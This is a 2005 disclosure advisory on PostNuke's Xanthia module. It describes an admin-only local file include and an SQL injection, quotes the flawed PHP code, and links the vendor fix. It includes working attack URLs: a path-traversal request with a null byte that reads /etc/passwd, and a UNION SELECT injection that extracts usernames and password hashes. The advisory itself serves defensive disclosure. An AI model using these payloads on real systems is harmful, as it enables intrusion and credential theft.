[PostNuke Non Critical SQL Injection and Include 0.760-RC3=>x cXIb8O3.10] Author: cXIb8O3(Maksymilian Arciemowicz) Date: 2.4.2005 from cxsecurity.com TEAM - --- 0.Description --- PostNuke: The Phoenix Release (0.760-RC3=>X) PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ - --- 1. Non Critical Local files include --- This error exist in modules/Xanthia/pnadminapi.php. You can read all files in server if the PHP is bad configured and if you have admin right. For exemple: http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=cXIb8O3 etc. Error message : - --------------- /www/PostNuke-0.750/source/html/modules/Xanthia/pnadminapi.php on line 1053 - --------------- or http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=credits&skin=[FILE] but you can give to varible skin path to other file. Exemple for /etc/passwd http://[HOST]/[DIR]/source/html/index.php?module=Xanthia&type=admin&func=addTheme&authid=&skin=../../../ ../../../../../etc/passwd%00 Vulnerability code in modules/Xanthia/pnadminapi.php: - ---1039-1052--- $cWhereIsPerso = WHERE_IS_PERSO; if (!(empty($cWhereIsPerso))) { $xaninitlang_path = $cWhereIsPerso . 'themes/'.$id.'/lang/'.$langs.'/xaninit.php'; $xaninit_path = $cWhereIsPerso . 'themes/'.$id.'/xaninit.php'; } else { $xaninitlang_path = 'themes/'.$id.'/lang/'.$langs.'/xaninit.php'; $xaninit_path = 'themes/'.$id.'/xaninit.php'; } if (file_exists($xaninitlang_path)) { include_once($xaninitlang_path); } include_once($xaninit_path); - ---1039-1052--- etc. - --- 2. Non critical Sql Injection --- This sql injection is non critical because it works only with admin rights. - -1655-1676--- $sql="SELECT $column[module] as module, $column[block] as block, $column[position] as position FROM $pntable[theme_blcontrol] WHERE $column[position]='$dati[0]' ORDER BY $column[module]"; $result =& $dbconn->Execute($sql); if(!$result->EOF) { // Create output object - this object will store all of our output so that // we can return it easily when required $pnRender =& new pnRender('Xanthia'); // As Admin output changes often, we do not want caching. $pnRender->caching = false; $pnRender->assign('menu', pnModFunc('Xanthia','admin','thememenu')); $pnRender->assign('warn', _XA_NZWARNING); $pnRender->assign('columnheaders', array(pnVarPrepForDisplay(_XA_MODULE), pnVarPrepForDisplay(_XA_BLOCK))); while(!$result->EOF) { $row = $result->GetRowAssoc(false); - -1655-1676--- So if we want to make successful attack we need first log_in as postnuke administrator. When we are administrator we can go to : Example: http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=8&riga[0]='cXIb8O3& amp;riga[1]=and&riga[2]=sp3x&skin=PiterpanV2 Error message : - --------------- Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnadmin.php on line 1676 - --------------- Exploit for admin: http://[HOST]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION %20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/* - --- 3. How to fix --- PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format) http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html SHA1: 6e76d92124c833618d02dfdb87d699374120967d MD5: a007e741be11389a986b1d8928a6c0e5 Size: 160550 Bytes or CVS - --- 4.Contact --- Author: Maksymilian Arciemowicz